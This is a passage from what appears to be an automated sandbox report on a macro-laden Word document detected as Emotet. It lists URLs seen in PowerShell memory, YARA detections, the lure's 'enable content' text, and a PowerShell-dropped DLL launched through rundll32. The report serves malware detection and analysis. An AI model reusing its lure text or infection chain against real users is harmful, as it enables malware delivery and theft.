                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/adaptive.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/animate.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox.css?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/gutenberg/css/frontend-style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquer0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.iLightBox.min.js?ver=2.2.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.script.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jquery.tweet.min.js?ver=1.3.1
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jqueryLibraries.min.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/jsLibraries.min.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/js/scrollspy.js?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/themes/econature/style.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/2020/01/Logo.png
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_colors_primary.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_colors_secondary.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature_fonts.css?ver=1.0.0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/js/wp-embed.min.js?ver=5.5.3
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-includes/wlwmanifest.xml
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/wp-json/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/xmlrpc.php
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://physio-svdh.ch/xmlrpc.php?rsd
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://settings.outlook.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://staging.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://tasks.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.8.2/css/all.css?ver=5.5.3
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://webshell.suite.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://wus2-000.contentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.com/training/b/
                Source: powershell.exe, 00000004.00000002.697183346.0000027114743000.00000004.00000001.sdmpString found in binary or memory: https://www.isatechnology.comArAC
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://www.odwebp.svc.ms
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownHTTPS traffic detected: 194.209.195.106:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.208.182.43:443 -> 192.168.2.4:49744 version: TLS 1.2

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. End of document W Screen 1
                Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. End of document W Screen 1 of 1 O Type here to
                Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                Powershell drops PE fileShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJump to dropped file
                Very long command line foundShow sources
                Source: unknownProcess created: Commandline size = 7856
                Source: unknownProcess created: Commandline size = 7765
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 7765Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Ezfa\Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30D7F4_2_00007FFA34A30D7F
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30D874_2_00007FFA34A30D87
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30CD04_2_00007FFA34A30CD0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A30D304_2_00007FFA34A30D30
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000D2706_2_1000D270
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10011EA76_2_10011EA7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_100127506_2_10012750
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10012B5C6_2_10012B5C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1001237C6_2_1001237C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10012F7C6_2_10012F7C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4D4F68_2_00F4D4F6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F450E18_2_00F450E1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F576E88_2_00F576E8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F59CD78_2_00F59CD7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4ECCD8_2_00F4ECCD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5A0B08_2_00F5A0B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F53A9F8_2_00F53A9F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F59A138_2_00F59A13
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F462128_2_00F46212
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4241B8_2_00F4241B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4CDF78_2_00F4CDF7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F42FF88_2_00F42FF8
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F543CB8_2_00F543CB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4B5A98_2_00F4B5A9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F51D818_2_00F51D81
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F415778_2_00F41577
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F545728_2_00F54572
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F527668_2_00F52766
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4DB628_2_00F4DB62
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F44D3C8_2_00F44D3C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F55D258_2_00F55D25
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A7118_2_00F4A711
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F45B1F8_2_00F45B1F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F51AD18_2_00F51AD1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F45EDF8_2_00F45EDF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F42CDA8_2_00F42CDA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4EEC48_2_00F4EEC4
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F588C28_2_00F588C2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F532B28_2_00F532B2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F514BB8_2_00F514BB
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4AEA08_2_00F4AEA0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A8AE8_2_00F4A8AE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F594948_2_00F59494
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F50E908_2_00F50E90
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5A29B8_2_00F5A29B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F416738_2_00F41673
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F56C518_2_00F56C51
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4CA318_2_00F4CA31
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F524338_2_00F52433
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F582258_2_00F58225
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F410138_2_00F41013
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4E8008_2_00F4E800
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F49E028_2_00F49E02
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F506098_2_00F50609
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F41BF78_2_00F41BF7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F483F08_2_00F483F0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4C3FE8_2_00F4C3FE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4AFF98_2_00F4AFF9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F445F98_2_00F445F9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F48FE58_2_00F48FE5
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F471EC8_2_00F471EC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4F1ED8_2_00F4F1ED
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4E1E98_2_00F4E1E9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4D7D78_2_00F4D7D7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F497DE8_2_00F497DE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F57FCC8_2_00F57FCC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F521B08_2_00F521B0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4B7BC8_2_00F4B7BC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F493AD8_2_00F493AD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F515AF8_2_00F515AF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F487AA8_2_00F487AA
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F443908_2_00F44390
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4C19E8_2_00F4C19E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F50B868_2_00F50B86
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4BF808_2_00F4BF80
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F46F7B8_2_00F46F7B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4196F8_2_00F4196F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5915E8_2_00F5915E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4EB268_2_00F4EB26
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F44B268_2_00F44B26
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4FD228_2_00F4FD22
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F5410D8_2_00F5410D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F43F0E8_2_00F43F0E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4F9088_2_00F4F908
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F511088_2_00F51108
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F465098_2_00F46509
                Source: v22Pc0qA.doc.docOLE, VBA macro line: Private Sub Document_open()
                Source: VBA code instrumentationOLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_openName: Document_open
                Source: v22Pc0qA.doc.docOLE indicator, VBA macros: true
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000B078 appears 46 times
                Source: 00000004.00000002.689082292.00000271130C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000003.685190093.000002712B8A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.700514213.000002712B630000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.698145971.0000027114D5D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.697286565.0000027114829000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.689101356.00000271130F0000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: 00000004.00000002.700460639.000002712B620000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                Source: Chpieog.dll.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.999260733061
                Source: classification engineClassification label: mal100.troj.evad.winDOC@16/14@3/7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F590E0 CreateToolhelp32Snapshot,8_2_00F590E0
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{6A94A75C-BF67-4F59-849A-17E54DA728FF} - OProcSessId.datJump to behavior
                Source: v22Pc0qA.doc.docOLE indicator, Word Document stream: true
                Source: v22Pc0qA.doc.docOLE document summary: title field not present or empty
                Source: v22Pc0qA.doc.docOLE document summary: edited time not present or 0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: v22Pc0qA.doc.docVirustotal: Detection: 72%
                Source: v22Pc0qA.doc.docMetadefender: Detection: 44%
                Source: v22Pc0qA.doc.docReversingLabs: Detection: 86%
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
